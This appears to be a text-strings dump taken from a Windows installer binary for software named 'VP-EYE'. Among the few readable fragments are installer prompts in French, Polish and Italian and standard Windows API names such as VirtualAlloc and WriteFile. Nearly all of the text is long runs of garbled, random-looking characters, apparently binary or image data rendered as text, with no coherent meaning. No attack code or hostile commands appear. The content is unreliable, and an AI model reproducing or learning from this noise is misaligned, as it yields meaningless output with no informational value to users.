v]Cx`Bx`Dv`=yaE}cEzeF~d<}d<{d>~e;~e=
VCzO<wO=oF7sQArSDsXJrUGhM?jOAuXJpVJiSHmTJoRItTGvTGtTIoODgK@iOClTHnVJiRBqWGtRErOBvVI}`RwZLwWJrQBnM>qN@|ZMz]OrXLmRDjM?lI;nG9|QB
VCzO<xP>pG8tRBsTEuXJrUGhM?jOAuXJpVJiSHmTJoRItTGvTGtTIoODgK@iOClTHnVJiRBqWGtRErOBvVI}`RwZLwWJrQBnM>qN@|ZMz]OrXLmRDjM?lI;nG9|QB
VCzO<xP>pG8tRBsTEuXJtTGhM?iN@sXJpVJiSGmTJoRIsTEtTGtTGmODgK@hNBkSGnWHiRBqWGtRErOBvWH}`QwZLwWJrQBnM>qPA|ZMz]OrXLmRDjM?lI;nG9|QB
Vd{Ucuiu
vdueOao\k]HWM9FYDMWBJkT\^GLT=AVAD^ILO:=C,0P;>U@CXEHL9<5 
VD=WB:cJ@lRF
?Ve=Qb6M]=Ug;Th:TeH_oNap>Ob6HY:M\1GS6`gX
?Ve>Rc7N^>Vh;Th:TeH_oLap<Pa6HY:M\/GS6`gX
Version
Version 3.0
VersionNumber
Verzeichnis w
Verzione 3.0
ves`SmYNnYQlWO
VEtRBvRB
Veuillez faire entrer le nom sp
Veuillez faire entrer le registre que vous voulez pour garder ce software.
Veuillez ins
VEuSCvRB
VexCQgGUlM`uHZqIWsP^zWd~Yg~Xf}Ve
VexCQgHVlM`uHZqIWsQ_{Wd~Yg~Yg~Vf}Ve
VexP`qQarM]nFUhIZoJ[pZi|g|
VEyA0{E4
vE{yKz|L||L|i3vS
vfwgTe
<Vg*DP-GMz
<Vg*EO,FL{
vg}^OyYL|[L
VG~TG~TG
v|htcL
viaeVM`OF\IAYE:TB7TB7VB7VB7WC8ZD9\F:aI=eK;rTC
v|ia{kdyke}li~ji{feiQYX>KD-5:*+6'$7(%<-+A2/?0.4&'3%'1$&2&&1''2')0%'/&)1(+4,-;34MGHnihlghadh]iojz
VIDEO BROWSER
video clips
VideoDriver
Video Games
VideoMode
vieAak:m
vi{k[mcQR
VIqG:bNCF
VIqG;lPIZ
@VIr{p
VirtualAlloc
VirtualFree
VirtualProtect
V[|IRx8Dn;GoGPuMVwPYzT[|RYzQWzJSuMVxIRtBKmIRtLUvIRtLTyIRxNW}S^
VI~TG}RA
VI~UF|Q@
vivYTfMQT=EH3;A-2D/1B.-:('6$#9(%<)&9&#;(%>-*=,):)&<)&@+)C,*>)'>+(3#$6'%>+(I-&L+"f@4
viwg[pgZv
viyfWmgTl
VjajZh
v}jbzmexjdxgdyhe|khvachQYR:DC/45'(0#!/" 2&"1%#3''3&(0&&.&&2**8325/0)$&($)FFLbcgafibhmaipZhn`s{h~
v}jbzmexjdxgdzif~khvaciRWR:DC/46()0#!-!
VJDS=7R?8F2-D/'M0'S3&W7,]@2bE7jL;sN@|UG
VjeQ=2S=2Q@3Z@9\E=gMArRE
{~v_]jF>~J=
Vj|H]rNavI]vH\uJ]xK^yNa|Rc}Q_{Yg
Vj[j\h
Vj]j_hI
Vj^jYh`
V[j[`o`cr]\lZWgWUhLJ]GDTGBQ}z
VJxQCzPC}SF~XF
VJyRDzPC}SF~XF
VKC^LAoYM
|}v`[kG?~J>
vk}g\o\OiUJkZQjZS_SM[SL+'"
vk}g\p]PjVKkZQj[R`TN[SL+( 
VK~[Q~cY}c\taZt_Wr\Vt_W{aU}\M}UB
v_ldiYS{^Z
vllthfrfbl]Zo`]iZWj^Zqecsjgsjgvoloid
vlQA5P>3RB6UC8T>3U?3`J?_I=aK?dNBdNBfNBfL>fK=pTC{[H
v~~\m6
vm}giwafzeh~kn
vm~hjxcfzeh~kn
vmjxljymi{li}liuhfnbbk^\l``qggqlkjeb
vmjxljymi|mj~mjuhfnbbl_]l``nffpkjida
VMoTJnTMqZR
vmp|gpm\`dWYbZZhad
vm~vovikmdgtfgwhf
VM|WI{XJ}TE}VG~TH
vnnWOsnUe
VNO}yzuqqHAB
vNPzGD
vnqWPlnJN
[\vNSfBHhBHjFLjEImGGb<:S-+T.*Q+'[51^61Q'"P)!V/'Y/(W-&N'
[\vNSgCIhBHiEKjEImGGb<:S-+T.*Q+&\61]50O( P)!V/'Y/(W.%N'
V>n@/|`U
VNY/%1QFP
VNYH?IP@GbKIgKDeHC`A@\:;Z73[7/Y4,V/'X1)X/&X."U+
VNYJ?IP@G`KIfJCeHCaBA\:;Y62[7/Y5+W0(Y2*X/&V."U+
vogJCvVI
vopd`h\Vi^Ve[Qd\O^XKb\QaXNfWNdUL`QH^TJcYO_UKWLDSH@UICYNFZOGWKEUJBQD<WI=gVIaPGXHA\OG\LE]LCTB7WC8XB6W=/X;,^A3_@1W:,V6)Q/
VOqC8r@4
Voq[:*lA.
vor\Qu[K~ZH
Vos5MSAX`D`gEbk=]c<Y`$DJ>`fd
vougkmcitfgxig
VP-EYE
VP-EYE Installation
v~~Pgcr
VPsDAh<:d76b43_31_1.\1(Z) S6)_B7o;5n:4mC9n;/c2,[3.[0-Z1-W1-W2.X2/\63a96h>:n==m;:l78j9:m=<tA@xEG}SQ
VPsDAh=;e76b43_31_1.\1(Z(
VPUVPU-
^vq#Bx
V]qGRh;H^;F\?H\;I\;I\6DV:GW<FW^hzJUk8F]5EVV\o
v~~Qhds
~V`QHzf[
vqlOJ\?:]E?eOIiMFnJBn@8{C8
vqrrffqdbuig
VR{GDqB@n>;l97e53a30a30^.+Y0(W,#U<8l<9q=7n82g31_/,Y/,Y0-[0*[/+\0-^21c73g;:l=>q>?r=?u@AyACyBC{EF
v{~r~gguY`tVbzTb~Pa|J[vFWrGXsM[wRYr^[kvfm
vrj^Zn_\sb_xhbzifxgdn^Xi\Tm`Xrf\yibpe]
vrj^Zo`]qb_xhbzifvgdn^Xi\Tm`Xte\yibpe]
VrlL4.M.%J0$R2'T6+iI>uSC}SG
vr|qmvlepi`lf[oh_
vr|qmwmfpi`le\oh_
vrrlemjelf_kh`jc`iaaqee|qm
vr~uozrox{uzumnmdanb\p_R|cO~`G
vr~vp{rox{uzumnlc`nb\p_R|cO
VRWZTYe_dvqn
^`vRXlISkITnLSmKRmKQjEGR..V0.Q,(U/+d>9S-(J$
vrzqm{rn{up
vrzqm{rn{up~yv
V^	S{?a
v{~s}gguY`tU`{Tb~Pa|LZvFWrHVrO[wTYr^[kuel
VSiHF\OQijn
)V@S~^q
[vs_>*qA/
V[sSXxIK}LNtV[gYdZ]eTW_TW\bcgodgoZ]lLMkC>rBAgDAm76g0+e4,j60l00k4/n53t>=tQNwLOxW^ur{gfojmqjik[XZVORQKL]TQm\SnJ:oA0mA4j?0l8'lE6eQLVPQNLLMEEVOLcTQeRKdB<k6,q=1pD7mC7a>1V<0V;1cH>iQErUGlRF
>+v;'s:!t2
VStMON.97
V\sT]qMVjGRhEKbU[rip
>+v;'s:!u3
V?|S<uQ9rP9rP9rQ>rQ>pN>vRBrN<X7'L-$vXW
V\sV]qMVjGRhEKbU[rkp
V]`SZ]krurvwvvv{|z
V]`SZ]kssrvwtvvy|z
v|TFL9*2^MZziv>-:7*2ncfqgm3(09+,
vThfad
}vtsmopnto
V[tSWxIK~MOsX\gYdZ]eUW_TW\dcgncfoZ]lKOkC>rBAgDAm76g0+e4,i5.j1/j3.m63t>=tQNwLOyX_usyegojmqhjk[XZVORQKL_SQn[SqJ;q@0nA4j=/l8'lE6eQLXPQNLLNFFVOLcTQeQLfB<j4-q<2oB7lB5a>1V<0W<2cH>iQEqTFmSGlNCbB7dG>oKCoC<pI@o<2o1'k:0eE?]JCL>8D52I61S>6[=8k;/k2#oA0oN?sE=sOImg`a\Y]\X[WRWTPYOOVQR`VVm_YpIAl;1j?6i8.j2'i>5aMH[TQSONOKFXQNcXTjVQiHEk77o<CiCIpAIr:?k;:l?;m=9m:8p=;nC@wQMxWTtILwpwegqaep`cr]du\cw_c|cf
V[tSWxIK~MOsX\gYdZ]eUW_TW\dcgncfoZ]lKOkC>rBAgDAm76g0+e4,i5.j1/j3.m63t>=tQNwLOyX_usyegojmqhjk[XZVORQKL_SQn[SqJ;q@0nA4j=/l8'lE6eQLXPQNLLNFFVOLcTQeQLfB<j4-q<2oB7lB6a>1U=1W<2cH>iQEqSHlRF
V[tSWxIK~MOsX\gYdZ]eUW_TW\dcgncfoZ]lKOkC>rBAgDAm76g0+e4,i5.j1/j3.m63t>=tQNwLOyX_usyegojmqhjk[XZVORQKL_SQn[SqJ;q@0nA4j=/l8'lE6eQLXPQNLLNFFVOLcTQeQLfB<j4-q<2oB7o<2b8,U=1SH:WfQM
VTZd`evrw
VTZd`fvrw
/;v,>u0A
VUiAH\9E]/?V,:Q3@V7GX5EV1AR6DV6BTCM_U`t;I\0CR_ex
VUWjhn_^g*+/%$& 
VUWkio_^g+,0%$&"
v{~uz}}
VVb?=PDAPEBQAAOABL;>B3;:4=:<GEBSO<MJ/=<Q^`u
vV+ES,IX(GV+HW2NY2LZ0JV/IU0JX/HX2J\1K[-JX.KY.IW/JX(BP(BN%>H'<D*<C)<C(;C)<D(<G(>I(@L&@L&AO&<G(8>&35&43(65'33'54(46(46+79)55(44)76+98-;:/8;1:=5:=55;66<36;3;;6DB7HE1CD/BG1CJ0BI8FL5AE8CG5AA*66/990;99A@9?>>DC@FEBHGGLKMPNGGGB@@DC?IHDJIECFD?FC;DA9B?7@=9><;84J@9
vV+ES,IX*GV,IX1MX2LZ0JV.HT0JX0IY1I[1K[-JY.KY.JU/JX(BP(BN&?I'<D*<C)<C(;C(=E(<G'=H)AM'AM'AO%;F'7=&35&43)55'33'54(46)57+77)55(44(65+8:-:</8;09<5:=55;66<36;4<<8EC8IF2DE/BG0BI0BI8GJ5AE7CE5AA*66/990;99A@7?>>DC@FEBHGGLJMPNGGGB@?CB>IHDJIEDGE?FC;DA:D>8A>9><;84J@9
V=vO3mD-Z:#[;(`F5VA2YJA6-)
V=vO3mE,Z:#Z:'`F5VA2ZKB6.'
vVqH1sC+pH6wQEsJ;pQBs]RhUHfVJaQDcQFbPIaRIdVJo^QpRAoL8sTEpP=nI3pR?h[KbaS`cT`_Qb[Li^PlYLnUEqM;
V\vQYkMRjKTsRY|[_
vVrH1sC+pH6wQEsJ;pQBs]RhUHfVJaQDcQFbPIaRIdVJo^QpRAoL8sTEpP=nI3pR?h[KbaS`cT`_Qb[Li^PlYLnUEqM;
vVrH1sC+qI7wQEsJ;qRCs]RfTIfVJ_RDcPHaOH`QHeVMo^QpRAoK9tUFpP=nI3pR?h[KbaS`cS^^PbZMh]OlYLnUEqM;
vVsC+pH6wQEsJ;pQBs]RhUHfVJaQDcQFcQFbPIaRIdVJo^QpRAoL8sTEpP=nI3pR?h[KbaS`cT`_Qb[Li^PlYLnUEqM;
VVV.--
vvvuy~C]zs
>#)V(.W!
VWaDIRbjqdnu9BK06Acit]cn-2;,3<ahq?HR
VWaDIRckrdnu:CL06Acit]cn-2;,3<bir>GQ
VW}RSyNPxLOuNW}PVySY~QX
||vw}rz
~vw^SUYNPk`bC8:,!#B::,'&$
vwxovxry
{|vw{xp{vr~tqz
\v:.X$
V`x#)<
V, X0$Z2&V."S+
V, X1#Z3%U-!S+
vx9*(=
vx9*(>!
vx9*(9*(>!
v{xafbKPL8=:)-1 +6'57'8:'6A-9>*6>,39$&2
vxqfheWXM><_HF~ig
{v{xturnyvrwqr}yxzxwbbbRWV
@VXvgf
~vxypvxry
VXzOQsTVx[\
V^]Ya`ionnsrxxx
VyAVJ@jYP
V\yEPp5De?Km@IjKSpS\wMZtEOm=FgBKmKTvHQsFOq<Eg4?_;Ff>Ii<HjAMo;GiCLqKSxKV|Va
V\yEPp5De?Km@IjKSpS\wNYtEPl=FgBKmISuGQsGPr<Eg4?_;Ff>Ii<HjAMo<HjCLqKSxNW}Yb
vy~fgkmpu
=+v;(y>.|K=~QC
vyqfheWXO=<_HF
>!Vy^Sx^Pv`OvaKq_InZLmXKhQFaQDbODdS=^O=^OC`PC_LC]MC]M@]M6XG0QB*=4&'%_NR
VYu?FY7GT6HS5IT6JU6GP3DG/@=.@9/@<-?>1?=.@A,?D)<C,?F-AF(<A)<C*9<(7:)68'35(46&24&35%46+47'03(22(22&22'35(46&35'35)25)25)25'35(46,58-69(46&/2'03&/2&00'11(31)42*/2*9;3QVRx}
@Vy@WwBX{:Mp5C`&0H
VYxV\yV\yY\xW\uS]u[_wY_vV]vS\wS]{9Hv
VYxW[xW[wWZvV[tV]vX\xV]vS\wT]xP[w6Es
VYxX\yW[wWZvV[tW^wX]vV]vS\wT]xP[w6Es
|V y}Xz
vyzqtxntwlvxmu}px|nt
v}zipmgohnpjosnqrnpqoopnqrpuvttrqrposqpqmlqmlqnjomljlmdgkY`cclp
v}zjomipinpjpqmpqmopnopnqqqwuusqqrposqpqmlrnmqmlomlkmmdhiY`cbko
VZl\ap`cr]\lZWgWUhLJ]GDTFAP~{
vz}nvg`oYZnUZoWXlYWjlbn
vz}nvg`oYZnUZoXYmYWjkan
vzpXZdEBsG@{J@
]vzR=5T@5hG>uVG}bT
VZv+<W$5P0?YN[uITr8Cc+6V1>^5Bb7Bb;Ff3<]7@a;Ff<Fh<Hj>Hj<EjAJo@Hm@Hm=Dk>ElTY
vZ/Ye,]k+\j)]j+]i,_i2`k4`m1^l-Xg(R^+QV)SZ)SZ)PX)PX(P\%O\%LZ#JS%BP%@N&=L$8I&;J&;J'=I)?J'AM(@L&9@'46'33&31*36+47*68(14(14)25*68(65)76+98/;=/<>0=?8EG/<>2?A5AE5@D:BI>BGFIMJRRM[ZXhgVgjXkp?PY7EK=II@KIDJIDIHBEC@B<CGAFI@JKBMJEJGBGFBEFB@CA=A<8>95<93:7688732:.,Q<:
vZ/Yf,]k+\j+\j+^h-`j3`k4an1^l-Xg(R^+QV*T[)SZ(OW(OW(P\%O\%LZ#JS%CN&@N'>M$8I&;J&;J&>J'@J'AM&@L&9@&35&22&31*44+47+47(14(14*44*66*66)76+98/;=0<>0=?8EG/<>2?A6BD5AC:BI>BGGJNJRRN\[XhgVgjWjo?PY6DJ<HH@KHDJIDIHADBAC=DF@GJAKLCMJEJGBGFBEFB@CA=A<8>95<93:7688732:.,Q<:
W0|M.G/#LBHf^ivlx
W0}N/G.$LBHf^ivlx
W0YX0wx
(W 1\,?d>RuZm
W1-Q,(V30W72R2-M.+V87_@AaBC]>=
W\]28=$&0^[{]Vy`Y|ZTwZSt]TuaXy\[{TVxQV}MS
w\2Sc-Yj*[k.]r._o*Zl,`m.aq1as.Yh*R^-R`*Wb,T`*R^*Q_'M_#I[&GW)@P(<G';F%9D%9D&:E'=H&?I(AK'AM)AM':A&35%24(65)64(44'54(44'33)57+79)57)68+8:,880<<5AC2>@0<>6BB>FF<ADADLEJMDOML[WJ[XN]_XhnL\cBMQ5AC9BE>FF@FEEJHILJGHFBCABC?GICLIDNHCNHCKHCBFA<?=9><6=84:50534536/,J:4
W3)`=0vK<
W3+lH>uC7
>\w3Tn.Mf4Uo=[x7Sq7Ur0Pm3UrA`
)W&3YP^{
%&}( W4
:.W4*`=0uH:
w4Au8F{=J
W>4gE8
>\w5Sn.Mf5Sn=[x7Sq6Tq0Pm3Ur@_~Ac
W\<5v+
W5(Z:-f;,zL:
W=6c?7uNF
;]w7Q`-PG%na3
w8F{=J
W8~L0sC+h9#Z1
W@8nE6
|w9=trW
W=~aFh
watjTf\FXYGXYN^WP_ZP`WK]TGWPCQQBPM<JH5FJ;IK<JQ@NRCQPEUOGXIHX?BQ55C2.:7+73%02'1A7C<:F33?01?66B=;G;4A?8E@9H>9HA>N?AL@BMDDRHCRLETHAPC<KGBQFDXEFZDCWQPdjcxcWm_VkSLaRShab|]^xWUrZWqh^up_z
w~}blrXhoUey^nhN[sYf
w~}blrYgoUey^nhN[sZd
WC8]A6lJ=}VG
W`c_hkowwz
W`c_hlovy|
WCn8'P
WCn9%P
wcpeRar[i{dreMYW?IeMW]FNS=BO:=E/1ZEDlTTF10<&(J37C.1A,/B-+7
wcpfSbr[i}dreMYV>HdOW[FNS=BO:=E/1ZEDlTTF10=')J37C-2A+0B-+7
wDB|FE
w|}_dcfki
WD=^F@oUO
Wd~J[uSh
W]dMX\QYjT[lZ`mY_jZ_hWXbUT]SW\OX\NV]EJS:CL6>E4>E2>D2<C2>D/;A/;A.:@0<B0<B1=A3?C3?C/<>-:</<>0<@0<@.:>-9=3?A0<>/8;-69/8;09</99-77/7707:1:=3;;29<4;>1;;2=;4<;6>=28=1=?9NPQu}
Wd~QaxO]s7BX#*> ':&,?',A.2J
WdrXhtSamIU_FOXBLSALP7>G5?F:@G8AE7BF:JQHenl
WdrXhuSamIU_FOXBLSCLP6=F5?F:@G8AE7BF:JQHenl
Wd~R_yTa{^k
WD|TAyQ>yQ>{S@|TA|TAzR?zR?yP9zO:yO<yQ>{Q>hH;G;5]TP
wdu[O[PBH8(/.
W:+d>,zH4
WD~ZJvPDbF;eOC]E9_C8lQCbM>fL@oSHuXJx[M~aS
WE>]E?tTN
w|{ejilmikmgmqlhmkglkdij
We{PavYg}\j
Wersja 3.0
wfiZIL_KJjOKlOKmONjPPlTVqY[qY[t\^uZ]sZ^w^bw`e|ae
wfiZILZIL_KJjOKlOKmONjPPlTVqY[qY[t\^uZ]sZ^w^bw`e|ae
w|{fkjklhklhmqljmkglkdij
wf~XFzK0|G,
Wf!Xg(\l)\l"TfT
|W[G&*4
WG7O6,V60ZD9hNGjWOx_U
W\}GMj5;X49RABWWQbf\i{jw
WgxFUhM\oR`wTd{Ud~P\xR_yVc}Ta{Ta{U`{NYo1;LEPXUac[fd[e_
WgxFUhM[qR`wTd{Ud~P\xR_yVc}Ta{Ta{U`{NYo1;LEPXW`c^fe]d_
Wg~Zh~Xf|O`sRduQarHWjHYlK\oXhyOip?\a=[\:RR-B@1CD2DE:KNERTSUUg]V
|W[H'+4
w^h]EM`FLP36T65[<9W98V78Y@D[@ChLLK,)B
w^h]EM`FLP44T73Y<8W98W89Y@D[@ChLLK,)B
wh}WEzK0|G,
Wh}Zh~Xf|O`sRcvOarFWjHYnK\oXhxQhp>[`<Z[9QQ-B@2DE3EF:KNFSUSUUg]V
w|ia|nh{lizifxgd|mj|lfyedjTYS>G<,33''0'$/&"5,(A85@88@96>:5A>:GEDHHH=<>9<A]cjrz
w|ia|nh{mgyhexgd|mj|lfyediSXT?H<-13''/&#/&"5,)B96@88@88>96@=9GEDGGG=<>8;@]cjr{
w{ib|`_
WicVWHF\MJ^JI`MJiVSnc[
WideCharToMultiByte
WI}I<yF6yG5{G7t7)i-
WI}I<zF6yG5{G7t7)j.
 Windows 3.1 (16 bit)
 Windows 95 or NT (32 bit)
WinHelpA
WinMain(): RegisterClass() failed
 winsta0
WipEYdI[fOalK_j^t
WipGYdHZeN`kK_j^t
W\}IRx8Dl;GoFOtOVwRYzR[|PYzQWzLRuLUwIRtBKmISuLUvIRtKTyHQwNW}U^
WithTag	
WIwK:pB0wF6
W<?jKRsRY
wjvYTfMQT=EH3;B.3D/1C.0;'&8$#<)&=*'9&#;(%@-*?,):('<)&?*(B+)>)'>+(3#$7(&>+(I-&L+"f@4
W@}K7tG2t?+
W\KBSD;]K@qZK
wkevc^rZZ
W:~L0tD,h9#Y0
wld|fa
W@L<	$l7S
W\}LUz:Fn5BhEOqLUvPYzS]{JStMSvKQtGPrGPr=FhBKmGPqHQsLVxIRwHQwR[
wl|viyzo
WmdmPmSN'Fa
_w}Mjo9SZ6OY@dlc
wm}v\jyXgsTc{MSyU[sepnk{mk~jkyokvvmwzitvW^{LO
WNclcx
WNcnbx
W\[NPP}~z
WNX603
WNY713
WO$_9E
wo}c\saVn
Wolne miejsce na dysku:
WOZ/%1QFP
"W< P6
wpfSKVB7`I:tXG
W_p?FY39P+2K+0I+0I9@YENbKSjAKc<G]8BZ7DZ5CY9G^6DZ5DW8GZ6FW5GX/AR!2E+<Q.?T1BU2CV(9L'8M*:Q,<S/>X2A[3A]4B^5C_:Mh0E`1Kc2NfHa{Un
W_p?FY39P-2K+/K,0L8?XENbMSjCJc;F\8CY7DZ5CY:F^7DZ6DW8GZ6FW5GX/AR!2E+<Q/@S1BU2CV(9L'8M)9P,;U/>X2@\3A]3A]5C_:Mh/E^1Kc2NfHa{Tm
Wpisz nazw
wpn\UsaZdRK
wpn\Utb[eSL
w potrzebnych do instalacji.
wp~qi~qi
Wpt5MSAX`EahDcl@]f;X_$DJ=`dd
w~{q~ggw[bvVa|Sa}M^yJ[vGWtEZvHZwQ\wY]pmeo
wq\H=^F:eK=mPBtRB
WQJTB;WE>\IA`RLg\Tsf^
W\}QXyGNoGNoJSuKTvHQwIRxHQvMV{NW|T]
w{qY[eFCrF?|KC
wqzndoaUkYRnbVocYfZTf[W?55"
W<'R9)T5&L,&K+&O/)R30S3.W5/R2,U3-O3(Y<-]?.W:%V5!V6#M6.B1$A2"L8-V<0S1!Y2#Y?/[B2V8%XC4P>7TA9O?9I:8J72M94P75X37Y7>S5@Q/6V28X>DGDSGEXIJ_PQk\RiYMcYG^_Vpa\{a\qTUiMNb[Wjhcxmdxrcxv_upVmaI[^CSZDVW1CZ3BY5EW3?Y4>a0>c7HaERe@JrGT{Wgm^lj`meXfq`mq^ay^ZyXU
Writea7
WriteFile
WritePrivateProfileStringA
wrlOJ]?:]F>gRJjPIqMEqC;zE8
wR]MFtg_
Wr|Mq{HoxDkt2Ya<ck?gl9_d8]a0TZ*PT)RU0V[=\eZu
|wrojnkg
W<~R;~U<
W\}RYzGNoENoJSuKUwIPwJQxIPwNV{OW|T]
ws;41!
w|sfsg[i]Qi`S}uh
wS`IAz`T
wsojikjf
wsojilkg
wsojiokj
]w~SovPmrOmrSpuB_d-GNg~
|w|so}wrxollgfwiml[_
|wspknkg
wsprintfA
WSRHC@rlg
WSRHC@smh
W>|S<uQ9rP9rP9rQ>qQ>oM=vRBrN<W6&L-$wXW
^`wSYlISkITnLSnLSmKQjEGT..V0.P*(U/+c>:T.*L# O)$S+&U.&Q(
ws}zroggrflqfivgd
Wszystkie prawa zastrze
W)"T4)P(
W( t?5
wtcPMZGD[HEaNKgTQbOLaJH^JE_LEcPIaNG^KH`PQ
wtcPMZGD[HEaNKgTQbOL_JH^JE_LEcPIaNG^KH`PQ
W[t?FY7GT6IQ5IT5IT6GP3DG/@=.@9/@<-?>1?=-?@,?D)<C,?F-AF)<A*<C+:=(7:*68'35)25&24&35'46+47'03(22(22&22'35(46'35(46*36)25)25'35(46,58-69(46&/2'03(/2(/2)11(22)42+.2*9<4QVSw
wtg(m[
wt|if~khxe`
WTjHF\QQiim
wt~nh}unznjwfiwhfo`]
wttnrcaq_^xdc
wtvojk
{~wtvojk
[WTXSXTOD<5;9/F>7ZH=VF:dTHv^R
W<uL3lD+b;%Y9&fL<{h[ocY3*&
W<uL3lD+c<&X7'fL<{h[ocY3*&
wupglg^d_Vc`Xff`mnjtyx7<=
wupgmh_d_Vc`Xggamnjuzy8<=
~~{wupmqliqliolhlji[[[NSR
WUsNUfCOY1F\)@n3Av55S%
WUtMOM-87
wuuZVeHD`C>aC>eE@`B=\@9\?:\B;gH?pNHlH@yB3
wuuZVeHD`C>aC>eE@`C<\@9\?:[A:gGApNHlH@yB3
WV_0+45+1=39E;AE:B/J^0K_2N_5R`9S_9T^9S_6P`0L],KZ+KX-L[2Xd=`mDaoCVc5DT/?L*<G-@H'=H&>J(AK(>I)BL$@K&?I&9>&24'35,36.3604902:46>:9B8;C8=@7?>2@<5D@/A@)=>(;>&9@%7>'7>)8;(57$00$21&43%13(14(14(14'35&24)25)25'35".0&24&24#/1)57,58+55,36(443><;>B4=@<@ADILESYNegn|
wvbOL]JGaNKdQNdQN_JH\GEYF?\IBeOIhSKdQJXHBK<9
wvbOL]JGbOLeROdQN_JH\GEYF?\IBeOIhSKdQJXHBK<9
wvcQPjWTo\Yn[XgRPiWPlYTjXQiYRo_Xn\U\OG
{wvuuurxsY^]VXX
W\}V[|X^
W\}V[|X_
wvxheg___SSSWWWRRRWUUFDDMKKIGGGEEKLJvwuZ[YOMMPKLXTS^ZYjeftop
wvxheg___SSSXVVRRRUUUDDDMKKKFGGEEKLJvwuYZXOMMPKLXTS^ZYiedtop
W\_VXY
W\]VXY
   www
wwwussyutyut}zvwrqxvudffKMM
&&&???WWWVVVlll
wwwwww
wwwwwws0
wwwwwwwww
W( ].&\-%X*
wxldewop
wxmefwop
W<xR:sP<oN;mL8fH5[A3T=5R95P73K50K50N83J61J74L96G86E86D88C68A99G==J>>P@ASA@C.,H/-xYZ
wx^SUYNPk`bC8:+ "C;;-('%
wxvvtsyutyut}zvwrqxvudffKMM
|wxxxx
Wybierz katalog
Wymagane miejsce:
`W|`YnYQ\{>:
wyo[ZhHCxG?
?-|<*{=-w<,zB1
_Wzlmplrkmucbfa]bihjxmo
wzoktkhumf
W<zQ:sP<oN;lM8fH5Z@2V<5Q84P73K50I50N83J61J74M:7G86D67D88A68C99G==K??N@ASA@D/-H/-vZZ
>!Wz_Sx^Pv`OvaKq_Im\NlYKgSFaQDbOBdS=^O=^O@`OC_LD^ND^L@^K6XG0QB*=4&'%_NR
>!Wz_Sx^Pv`OvaKq_InZLmXKhQFaQDbODdS=^O=^OC`PC_LC]MC]M@]M6XG0QB*=4&'%_NR
WZv57Ude
WZv68Vcd
W\zV\}_d
WZvLPlWZv_`|cd
W\zW[}_d
[WzZ\{Y\{UYuTXpW]pRXoKToP[wUb|Wc{[e}We|\k
~=!|<#x<$
<	=x=}=
[.#]/$X'
]/$\-%X*
<>x.0f<Bm
X0$lA2
X0$mB3
X>0XA1jH1
X 0yCR
,X&1](4^*5[&2V!-Q".V /]$4b&6a
)X 1\,?d?Ru\m
X1#eH9XH;2+"
X.!\?1UE981(
X 1yCR
X."]2)]2)T&
X2.Q,(V30W72R2-M.+W87_@AbBC_=>
x\2Sc.Zk*[k.]r._o*Zl,`m.aq1as/Zi)Q]-R`*Vc,T`*R^*Q_'M_#I[&GW)@P*<G(:E'9D%9D&:E'=H&?I'@J'AM'AM(;B&35&35'54)64(44(44(44'35)57,8:)68)76,:9-990<<4AC2?A/<>7CC<FF:ADACMEINDOML[WK\YN]_XhnL\cBMQ5AC9CC>FEAGFEJHILJGHDBCABC?GICLIDNHAMG@JGBDEA=@>9><6=:497/424536/,J:4
X]^39>$&0^[{^Wz`Y|ZTwYRs]TuaXy\[{TVxTV~MS
X=3hE8
X/&\3*Y3'T."T, U/#[4+kA:mC>mB?nA>m=;o><s@=vD>vF@yIC
x4Au7Ez<H
}X58M)-@ $7$"8!
X?5c?7rME
X5!jP@zeV^PD)
X7#`C.
X7}S6sL0hF/^=-T9/M4*G0(C/*?0.9+/9.6@5?;2<;6?<8C=;GB=LIBOMGRMITRNZSQ][Wc^Ze]Yd]\fa`jc_jedmjgpjhnqjqrjqaVYbPQsYY
X-$^8,sI=
x9mZ4\P4`W<
/X&;a%8]<QqASp&8O-AS.BS1DS4GV5EU5EU6EU?O\>N[ERbIVfN[kRaqUbrdp
XA9iF<}PB
/X&;a&9^<Qq?To&9N.BS.CR0CR6FV6FV4DT6EU?O\>N[DQaIVfMZjRaqUasdp
$-;XaHbn.HT7S^BbmCalKjsJiru
$-;XaHbn.HT7S^BbmCbkKjsKjsu
Xa+hr0ny/kw1jy2fv1eu.bs/ct7jz;l|3dt.\m,\h2`qCr
Xa+hr1oz/kw0ix2fv.et,bs/ct7jz:k{3dt-[l-]i2`qBq
XA{L7qC1zH6
XanDPZT[dKX`M\eYp
xaohO]mTbiR`S>GP9AN59D,,@'%G.*H/-C++M57E--D,.="
xaohO]mTbjSaT?HP9AL59D,,@'%G.*G.,B*,M57E-/D,.="
?XA`Wpk&
x~aXy`Vl[Nj
XB7cH:lJ=}XJ
xbFr`Cy_Au^Dw_Cv`Dy_At^EwaEwaE~bD}dB}c>}dB
xB}h5{e1~b%
Xbi".25??[daNWTJSPnur}
Xbi".25??[daOWVJSPnur}
\XbJJ`KN\KN]JM`KM]IH[FH^IKaLNfPRfPR`JL\FH]GI]EGZEDZED^FFdGCsJA
\XbJJ`KN\LM]KL`KM^JIZEG]HJaLNeOQfPR_IK[EG]HG]EEZEDZED^FFdGCsJA
xbujTf\GVYGXYM_WP]ZP`VJ\TGWPCSQBPM<JH5FJ:KM<JQ@NRCQODTMGXHGW=BQ55C2.:7+72$/2'1@8C<;E33?01?66D=;G<5B?8E>9H>8IA>N?AL?@NDDRGBQLETHAPB;JFAPFDXEFZBCWQQcjdwcXl_VkSLaRSh_c|]^xWUrZWqh^up_z
XbzV`xT^vS\wOWtQ\xhp
/X,.CC
x}|_dcfki
XddAPR>MOANP?KO?IP@HO?GN@FM?AIEDMJJXSZk\m
\`xDHa+,F
~XdhMV_FQYKU_V_lQYfAQXku
XdhWbfdnuo{
XdjWcgcmto{
X]|DLjHSqP[yip
x{{dlybjube{fexZUvXWqZ_qXVm[\aSWZTYVRWRKRSJTTGUcO[jLWnKUkJQiGMjFLgLUhT`iV_iY`kZ]n[^jWZlWUqWQsXTmVTgHI^DDU@?W??T?BN;>S;=X@B^BB_@AcFIcNMdGCcJHbMO[LTXMPTMRSKRXKS]RUfMQjKNqU[t]eqN\kYfjYfbZdYOUUHJK9:L53Q;0Y1%\-%W4'Y(
x}{dmjKYX
\`xEIb,-G
x||emybjube|gfxYVvXWqZ^pVVlZ[aSW[UZVRWRKRSJTTGUcO[iKVnKUkJQiGMjFLgMSgT]jW`iY`kZ^nZ_hWZkVTqWPsXTmVTeII]CCU@?W??T=AP;>S;=WAC^BB_@AcFIcNMdGCbIGaLN[LTXLRTMRSKRXKS\QTfMQjKNoU[t]eoN\kYfjYfbZdYOUVHJJ89L53R<1Y1%\-%W4'Z)
